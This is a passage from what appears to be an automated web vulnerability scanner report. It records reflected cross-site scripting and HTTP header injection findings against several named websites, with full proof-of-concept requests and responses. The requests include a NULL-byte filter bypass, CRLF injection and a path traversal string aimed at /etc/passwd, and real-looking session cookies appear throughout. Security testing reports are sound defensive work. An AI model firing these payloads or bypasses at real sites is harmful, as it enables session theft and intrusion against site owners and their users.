Cookie: uuid=4dada9a870f2b; retargeter=generic; country=USA%2C69.54.6.26; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __kti=1303226768459,http%3A%2F%2Fwww.reputation.com%2F,; __ktv=5c97-7f2a-b613-c9f912f6e5e5c4f; __utmz=1.1303226769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=erpgsq3t7f3s77fo4055upbap3; abg_products/default6_d=products%2Fdefault6_e; repdef_ref_code=RCPT2; abglink_repdef_table_test=default; abg_products/repdef_table_a_0308=products%2Frepdef_table_a_0308; shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; _bizo_cksm_crc32=CC9F083; ysm_CK=ysm_PV:2&ysm_SN:1303227165978&ysm_LD:0; __utmv=; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A2%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A2%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A2; __utma=1.2095703321.1303226769.1303226769.1303227167.2; __utmc=1; __utmb=1.17.8.1303227590983

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 15:42:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=5lv01sev7u8klkp39i8n5uqbf1; expires=Sat, 19-Apr-2014 15:42:10 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 2282

{"totalPrice":771420,"isCartEmpty":false,"cartItems":{"0":{"bundles":[1862]},"3728a9cb87876df5a8e32444":{"bundles":[1862]},"de439\"><a>4789549632d":{"bundles":[1862]},"af3ef\"><script>alert(1)<\/scrip
...[SNIP]...
<a b=c>81c905857bd":{"bundles":[1862]},"10dae<img src=a onerror=alert(1)>2f4934042d5":{"bundles":[1862]}},"entities":[]}

3.6. http://www.reputation.com/services/panelrenderer.php [entityId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputation.com
Path:   /services/panelrenderer.php

Issue detail

The value of the entityId request parameter submitted to the URL /services/panelrenderer.php is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks at the URL /services/panelrenderer.php. The payload %00c3192"><x%20style%3dx%3aexpression(alert(1))>ea6b0850b6f was submitted in the entityId parameter. This input was returned as c3192"><x style=x:expression(alert(1))>ea6b0850b6f in a subsequent request for the URL /services/panelrenderer.php.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=%00c3192"><x%20style%3dx%3aexpression(alert(1))>ea6b0850b6f&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Request 2

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=0&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:59:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:59:59 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 104817
Content-Type: text/html; charset=UTF-8

<input type="hidden" id="_isCartEmpty" value=""/>
<div id="purchaseTop" class="left">
<div id="shoppingCartTable">

<div class="entityNameBar"><h2 class
...[SNIP]...
<select name="switchPlan[.c3192"><x style=x:expression(alert(1))>ea6b0850b6f][3594]" id="promoscaleSelect_3594" entityId=".c3192">
...[SNIP]...

4. HTTP header injection

There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Remediation background

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload da698%00%0d%0a3fd008c10bf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /marketing/event/features/?da698%00%0d%0a3fd008c10bf=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:40 GMT
Location: http://www.regonline.com/__features/?da698
3fd008c10bf
=1:
Connection: close
Content-Length: 0


4.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/pricing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a2d40%00%0d%0ab15c88885b1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /marketing/event/pricing/?a2d40%00%0d%0ab15c88885b1=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__pricing/?a2d40
b15c88885b1
=1:
Connection: close
Content-Length: 0


4.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.regonline.com
Path:   /marketing/event/testimonials/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8fca8%0d%0acb9e5a58209 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /marketing/event/testimonials/?8fca8%0d%0acb9e5a58209=1 HTTP/1.1
Host: www.regonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;

Response

HTTP/1.1 301 moved permanently
Content-Type: text/html
Date: Tue, 19 Apr 2011 19:40:35 GMT
Location: http://www.regonline.com/__resources/?8fca8
cb9e5a58209
=1:
Connection: close
Content-Length: 0


4.4. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The value of the gname request parameter is copied into the Set-Cookie response header. The payload d8998%0d%0a014a7d990d2 was submitted in the gname parameter. This caused a response containing an injected HTTP header.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=d8998%0d%0a014a7d990d2&gvalue=D,T HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwdviewAdJs&affiliateId=0&adSize=300x85
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^553c4931cdd8ccd429f38817a10831b2^116391130334874196611^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^905413033490113356^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^d8998
Set-Cookie: d8998
014a7d990d2
=D,T; expires=Sat, 23 Apr 2011 01: 23:31 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Expires: Thu, 21 Apr 2011 01:23:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:23:31 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

5. Cross-site scripting (reflected)
There are 991 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://www.4shared.com/advertise/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf8c"-alert(1)-"fa2cfce21c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertiseadf8c"-alert(1)-"fa2cfce21c6/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /advertiseadf8c&quot;-alert(1)-&quot;fa2cfce21c6/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D569F2525929105DF9E4B5CBCB35FEB6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:43 GMT
Connection: close
Content-Length: 36113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertiseadf8c"-alert(1)-"fa2cfce21c6/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

5.2. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe69"-alert(1)-"855c7c91d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertisecbe69&quot;-alert(1)-&quot;855c7c91d82/banners/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:20 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

5.3. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdfe3"-alert(1)-"24e87bceef2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/bannersbdfe3&quot;-alert(1)-&quot;24e87bceef2/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:36 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

5.4. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2c5"-alert(1)-"4c8ee2c4559 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop2e2c5&quot;-alert(1)-&quot;4c8ee2c4559/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:50 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.5. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24af2"-alert(1)-"972becc4068 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop/300x250.jsp24af2&quot;-alert(1)-&quot;972becc4068
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:33:03 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.6. http://www.4shared.com/advertise/banners/desktop/728x90.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/728x90.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e997"-alert(1)-"7bb2d897bb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
